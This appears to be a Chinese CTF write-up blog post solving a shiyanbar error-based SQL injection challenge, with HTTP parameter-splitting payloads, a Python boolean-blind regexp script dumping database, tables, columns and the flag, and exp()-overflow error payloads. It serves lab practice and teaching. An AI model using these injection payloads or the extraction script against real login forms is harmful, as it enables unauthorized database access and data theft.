NEKO

实验吧加了料的报错注入

2017/12/28

http://ctf5.shiyanbar.com/web/baocuo/index.php

and,or,regexp,’,/,*,等都没被过滤
其实username过滤了(),password过滤了报错函数

http分割注入

1
username=' or extractvalue/*&password=*/(1,concat(0x7e,(select database()),0x7e)) or '

布尔盲注

password处可以盲注

盲注有坑
首先字符集要这样写:
dic='!_{}@~'+string.ascii_letters+string.digits+'.'
‘.’一定要放在最后,因为’.’可以匹配任何字符,如果出现了’.’就说明是不在字符集里的符号。
不能有+号,否则会返回repetition-operator operand invalid' from regexp
这里特殊符号要放在最前面,因为数据库名是error_based_hpf有个or,检测or后面的时候由于这里使用的regexp,如果d_前面的话就会出现ord,而ord被过滤了,error_status就不是Login failed了,不过也可以把Sql injection detected当做另一个判断条件。
当然也可以找到correct_status,这里给出两种方法:

1
2
3
username=\&password=or 1 regexp 1 or '
username=&password=' or (select database() regexp 'e') or '
(之前的盲注是能看到数据库前几位的)

当然改个字符集就能完事了。

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import requests
import string
dic='!_{}@~'+string.ascii_letters+string.digits+'.'
error_status='Login failed'
flag=''

proxies = {
"http": None,
"https": None,
}
url='http://ctf5.shiyanbar.com/web/baocuo/index.php'

def crackdatabase():
strs = ''
for i in range(40):
for j in dic:
data = {"username": '',
"password": "'or ((select database()) regexp '^%s') or '" % (
strs + j)}
r = requests.session().post(url=url, data=data, proxies=proxies).text
if error_status not in r:
strs += j
print(strs)
break
#error_based_hpf

def cracktable():
strs = ''
for i in range(40):
for j in dic:
data={"username":'',"password":"'or ((select group_concat(table_name separator '@') from information_schema.tables where table_schema regexp database()) regexp '^%s') or '"%(strs+j)}
r=requests.session().post(url=url,data=data,proxies=proxies).text
if error_status not in r:
strs+=j
print(strs)
break
#ffll44jj@users

def crackcolumn():
strs = ''
for i in range(40):
for j in dic:
data={"username":'',"password":"'or ((select group_concat(column_name separator '@') from information_schema.columns where table_name regexp 'ffll44jj') regexp '^%s') or '"%(strs+j)}
r=requests.session().post(url=url,data=data,proxies=proxies).text
if error_status not in r:
strs+=j
print(strs)
break
#value

def dump():
strs = ''
for i in range(40):
for j in dic:
data = {"username": '',
"password": "'or ((select group_concat(value separator '@') from ffll44jj) regexp '^%s') or '" % (
strs + j)}
r = requests.session().post(url=url, data=data, proxies=proxies).text
if error_status not in r:
strs += j
print(strs)
break
#flag{err0r_b4sed_sqli_._hpf} 猜测出.为+

exp报错

然而右边并没有过滤exp
exp报错适用于sql版本5.5.5以上
poc:

1
2
3
4
5
6
7
username=&password='or exp(~(select*from(select database())x)) or '

username=&password='or exp(~(select*from(select group_concat(table_name separator '@') from information_schema.tables where table_schema regexp database())x)) or '

username=&password='or exp(~(select*from(select group_concat(column_name separator '@') from information_schema.columns where table_name regexp 'ffll44jj')x)) or '

username=&password='or exp(~(select*from(select group_concat(value) from ffll44jj)x)) or '

原文作者: n3k0

发表日期: December 28th 2017, 12:59:42

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. http分割注入
  2. 2. 布尔盲注
  3. 3. exp报错